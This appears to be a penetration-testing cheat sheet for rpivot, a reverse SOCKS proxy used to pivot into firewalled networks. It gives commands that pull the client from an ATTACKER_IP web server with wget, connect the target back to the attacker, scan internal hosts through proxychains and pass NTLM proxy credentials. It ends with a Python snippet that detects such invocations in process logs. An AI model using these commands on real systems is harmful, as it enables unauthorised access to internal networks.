Overview

rpivot creates a reverse SOCKS proxy: the target connects back to the attacker. This is useful when the target can reach the attacker but not vice versa (firewall/NAT).

Download

git clone https://github.com/klsecservices/rpivot.git

Setup

Attacker (Server)

python2 server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

Target (Client)

python2 client.py --server-ip ATTACKER_IP --server-port 9999

The SOCKS4 proxy is then available on the attacker at 127.0.0.1:1080.

Transfer Client to Target

# Attacker — serve files
cd rpivot && python3 -m http.server 8000

# Target — download
wget http://ATTACKER_IP:8000/client.py

Use with ProxyChains

# /etc/proxychains4.conf
socks4 127.0.0.1 1080

proxychains nmap -sT -Pn INTERNAL_TARGET
proxychains curl http://INTERNAL_TARGET

Through NTLM Proxy

If the target is behind a corporate proxy with NTLM authentication:

python2 client.py --server-ip ATTACKER_IP --server-port 9999 --ntlm-proxy-ip PROXY_IP --ntlm-proxy-port 8080 --domain DOMAIN --username USER --password PASS

Notes

  • Requires Python 2 on target
  • SOCKS4 only (not SOCKS5)
  • Single-hop pivot
  • Lightweight — just client.py needed on target

Quick Reference

Task        Command
Server      python2 server.py --server-port 9999 --proxy-port 1080
Client      python2 client.py --server-ip ATTACKER --server-port 9999
Proxy type  SOCKS4 on 127.0.0.1:1080
NTLM proxy  Add --ntlm-proxy-ip/port/domain/user/pass
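
On the detection side, the client invocations above have a recognisable command-line shape. The following is an added example, not code from this page or from the rpivot project: it flags process-creation command lines that carry the client flags shown above and masks the --password value before the finding is stored. The sample events, function names and finding format are assumptions made for the example.

```python
import shlex

# Flag names are copied from the client commands on this page.
CORE_FLAGS = {"--server-ip", "--server-port"}
NTLM_FLAGS = {"--ntlm-proxy-ip", "--ntlm-proxy-port", "--domain", "--username", "--password"}

SAMPLE_EVENTS = [  # constructed process-creation command lines, not real telemetry
    "python2 client.py --server-ip 203.0.113.10 --server-port 9999",
    "python2 /tmp/upd.py --server-ip=203.0.113.10 --server-port 9999 --ntlm-proxy-ip 10.0.0.5"
    " --ntlm-proxy-port 8080 --domain CORP --username alice --password 'S3cret pw'",
    "python3 -m http.server 8000",
    "python2 manage.py runserver --server-port 9999",
]

def parse_flags(argv):
    """Collect '--flag value' and '--flag=value' pairs from an argv list."""
    flags = {}
    for i, tok in enumerate(argv):
        if not tok.startswith("--"):
            continue
        name, eq, value = tok.partition("=")
        if not eq:  # value is the next token unless that is another flag
            nxt = argv[i + 1] if i + 1 < len(argv) else "--"
            value = None if nxt.startswith("--") else nxt
        flags[name] = value
    return flags

def redact(argv):
    """Rebuild the command line with the --password value masked."""
    out = ["***" if i and argv[i - 1] == "--password" else tok for i, tok in enumerate(argv)]
    return " ".join("--password=***" if t.startswith("--password=") else t for t in out)

def inspect_cmdline(cmdline):
    """Return a finding for an rpivot-style client invocation, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes, e.g. a truncated log field
        argv = cmdline.split()
    flags = parse_flags(argv)
    # Match on the flag set, not the file name, so a renamed client.py still hits.
    if not any("python" in a.lower() for a in argv[:2]) or not CORE_FLAGS.issubset(flags):
        return None
    return {"server": f"{flags['--server-ip']}:{flags['--server-port']}",
            "ntlm_flags": sorted(NTLM_FLAGS.intersection(flags)),
            "cleartext_password": flags.get("--password") is not None,
            "redacted": redact(argv)}

def scan(events):
    return [f for f in map(inspect_cmdline, events) if f]
```

Calling scan(SAMPLE_EVENTS) returns two findings: the plain client invocation and the renamed script using the NTLM proxy flags. The http.server and single-flag lines are ignored.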